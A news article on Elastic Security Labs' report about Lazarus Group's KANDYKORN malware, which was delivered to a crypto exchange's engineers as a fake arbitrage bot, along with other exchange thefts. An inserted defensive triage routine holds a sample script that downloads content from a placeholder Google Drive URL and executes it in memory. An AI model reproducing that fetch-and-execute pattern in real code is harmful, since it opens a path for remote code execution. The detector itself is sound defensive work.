Hackers allied to the Lazarus Group targeted a digital asset exchange in April with new malware dubbed ‘KANDYKORN,’ a new report has revealed.

The Dutch firm Elastic Security Labs revealed that the attackers lured the engineers of an unnamed digital asset exchange via a public Discord channel. They led the victims to believe they were downloading an arbitrage bot.

However, upon decompressing, the ZIP archive revealed a ‘Main.py’ script and an accompanying folder containing over a dozen other malicious Python scripts.

The chain unraveled quickly, initializing a Google Drive URL from which it downloaded malicious content. The five-stage infiltration ended up in the installation of KANDYKORN, a malware that gave the attackers advanced data access capabilities, revealed Elastic.

“KANDYKORN is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes reflective loading, a direct-memory form of execution that may bypass detections,” the report summarizes.
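As an added example (not code from the Elastic report or from this article), the following Python static-triage routine flags the delivery pattern described above: a Python script that embeds a Google Drive URL and hands fetched content to an in-memory execution sink such as exec, eval or compile. The sample scripts, the file id and the function names are constructed placeholders.

```python
import ast
import re

# Constructed sample scripts (not recovered from the real campaign) that
# mimic the described pattern: a script builds a Google Drive URL, fetches
# content and executes it from memory.
SUSPICIOUS_SCRIPT = '''
import urllib.request
URL = "https://drive.google.com/uc?id=PLACEHOLDER_FILE_ID"
data = urllib.request.urlopen(URL).read()
exec(compile(data, "<remote>", "exec"))
'''

BENIGN_SCRIPT = '''
import json
def load(path):
    with open(path) as f:
        return json.load(f)
'''

REMOTE_HOST = re.compile(r"drive\.google\.com", re.I)
EXEC_SINKS = {"exec", "eval", "compile"}


def _call_name(node):
    """Return the bare name of a Call target (exec, obj.compile -> compile)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def triage_script(source):
    """Walk the AST and collect Google Drive string literals and execution
    sinks; 'flagged' is True only when both are present in the same file."""
    urls, sinks = [], []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if REMOTE_HOST.search(node.value):
                urls.append(node.value)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_SINKS:
                sinks.append(f"{name}@line{node.lineno}")
    return {"urls": urls, "sinks": sinks, "flagged": bool(urls and sinks)}


def triage_bundle(files):
    """Triage every .py member of an extracted archive; files is a list of
    (name, source) pairs. Returns the names that were flagged."""
    return [name for name, src in files
            if name.endswith(".py") and triage_script(src)["flagged"]]
```

A hit is a triage signal for analyst review, not proof of the KANDYKORN chain; benign updaters also fetch and exec code, so pair it with the Discord delivery context and reflective-loading telemetry.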

Elastic didn’t reveal the identity of the exchange the hackers targeted, but it disclosed that the attack took place in April. That month, the biggest attack on a digital asset exchange hit Bitrue, a Singaporean entity that lost $23 million. Bitrue didn’t reveal further details about the attack but claimed that the hackers stole less than 5% of its total assets and that only its hot wallets had been compromised.

South Korean exchange GDAC also suffered a breach, losing $13 million. The hackers later laundered the proceeds through Tornado Cash, the Ethereum-based mixer whose founders were arrested and charged with conspiracy to commit money laundering and evade sanctions.

“The DPRK, via units like the LAZARUS GROUP, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions,” Elastic added.

North Korea has long relied on mixers to cash out its ill-gotten proceeds. However, in recent times, the country’s hackers have reportedly turned to Russian exchanges as ties between the two nations grow tighter.

According to Chainalysis, there has been a “significant escalation in the partnership between the cyber underworlds of these two nations.” And with Russia notoriously uncooperative with international law enforcement agencies, North Korean hackers could gain an extra layer to hide under.
